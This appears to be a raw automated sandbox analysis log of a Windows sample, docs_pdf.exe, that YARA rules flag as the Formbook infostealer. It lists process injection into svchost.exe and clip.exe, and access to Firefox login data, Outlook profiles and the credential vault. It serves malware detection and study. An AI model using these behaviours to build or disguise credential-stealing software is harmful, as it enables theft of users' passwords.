Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048A2E90
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0494EEDB
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0494EE26
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04890E59
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0490EFA0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04882FC8
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04932F30
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048D2F28
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048B0F30
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04904F40
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048768B8
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_048BE8F0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0489A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048928403_2_04892840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048929A03_2_048929A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0495A9A63_2_0495A9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048A69623_2_048A6962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0488EA803_2_0488EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04946BD73_2_04946BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494AB403_2_0494AB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494F43F3_2_0494F43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048814603_2_04881460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0492D5B03_2_0492D5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049595C33_2_049595C3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049475713_2_04947571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049416CC3_2_049416CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D56303_2_048D5630
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494F7B03_2_0494F7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048970C03_2_048970C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0493F0CC3_2_0493F0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494F0E03_2_0494F0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049470E93_2_049470E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0489B1B03_2_0489B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C516C3_2_048C516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0487F1723_2_0487F172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0495B16B3_2_0495B16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048952A03_2_048952A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AB2C03_2_048AB2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AD2F03_2_048AD2F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049312ED3_2_049312ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D739A3_2_048D739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494132D3_2_0494132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0487D34C3_2_0487D34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FCF23_2_0494FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04909C323_2_04909C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AFDC03_2_048AFDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04893D403_2_04893D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04941D5A3_2_04941D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04947D733_2_04947D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04899EB03_2_04899EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04891F923_2_04891F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FFB13_2_0494FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04853FD53_2_04853FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04853FD23_2_04853FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FF093_2_0494FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048938E03_2_048938E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048FD8003_2_048FD800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049259103_2_04925910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048999503_2_04899950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AB9503_2_048AB950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D5AA03_2_048D5AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04931AA33_2_04931AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0492DAAC3_2_0492DAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0493DAC63_2_0493DAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04947A463_2_04947A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FA493_2_0494FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04903A6C3_2_04903A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AFB803_2_048AFB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04905BF03_2_04905BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CDBF93_2_048CDBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FB763_2_0494FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027917203_2_02791720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027AA2803_2_027AA280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278CB303_2_0278CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278ABB03_2_0278ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278C9103_2_0278C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278C9083_2_0278C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027932703_2_02793270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471A43A3_2_0471A43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471C0FC3_2_0471C0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471B1683_2_0471B168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471BC443_2_0471BC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471BD643_2_0471BD64
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 034BF290 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0342B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03487E54 appears 106 times
            Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 048FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 0490F290 appears 103 times
            Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 0487B970 appears 262 times
            Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 048D7E54 appears 107 times
            Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 048C5130 appears 58 times
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: String function: 00FD8B40 appears 42 times
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: String function: 00FD0D27 appears 70 times
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: String function: 00FB7F41 appears 35 times
            Source: docs_pdf.exe, 00000000.00000003.1669498522.0000000003633000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
            Source: docs_pdf.exe, 00000000.00000003.1670406644.00000000037DD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
            Source: docs_pdf.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@9/5
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0101A2D5 GetLastError,FormatMessageW,0_2_0101A2D5
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_01008713 AdjustTokenPrivileges,CloseHandle,0_2_01008713
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_01008CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_01008CC3
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0101B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0101B59E
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0102F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0102F121
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0101C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0101C602
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FB4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FB4FE9
            Source: C:\Users\user\Desktop\docs_pdf.exe File created: C:\Users\user\AppData\Local\Temp\aut89B4.tmp
            Source: docs_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\docs_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: clip.exe, 00000003.00000003.2015132691.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2913704315.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2015132691.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: docs_pdf.exe ReversingLabs: Detection: 44%
            Source: unknown Process created: C:\Users\user\Desktop\docs_pdf.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\clip.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\clip.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: docs_pdf.exe Static file information: File size 1190400 > 1048576
            Source: docs_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: docs_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: docs_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: docs_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: docs_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: docs_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765523436.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906921154.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: docs_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: docs_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: docs_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: docs_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: docs_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0102C304 LoadLibraryA,GetProcAddress,0_2_0102C304
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_01018719 push FFFFFF8Bh; iretd 0_2_0101871B
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FDE94F push edi; ret 0_2_00FDE951
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FDEA68 push esi; ret 0_2_00FDEA6A
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FD8B85 push ecx; ret 0_2_00FD8B98
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FDEC43 push esi; ret 0_2_00FDEC45
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FDED2C push edi; ret 0_2_00FDED2E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004031C0 push eax; ret 1_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004161D3 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004162CC push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417356 push ebx; retf 1_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416338 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004083DA push es; ret 1_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040BBEC pushad ; iretd 1_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418577 push 2823B84Bh; retf 1_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417D38 push ecx; iretd 1_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411E39 push esp; ret 1_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340225F pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034027FA pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx 1_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340283D push eax; iretd 1_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340135E push eax; iretd 1_2_03401369
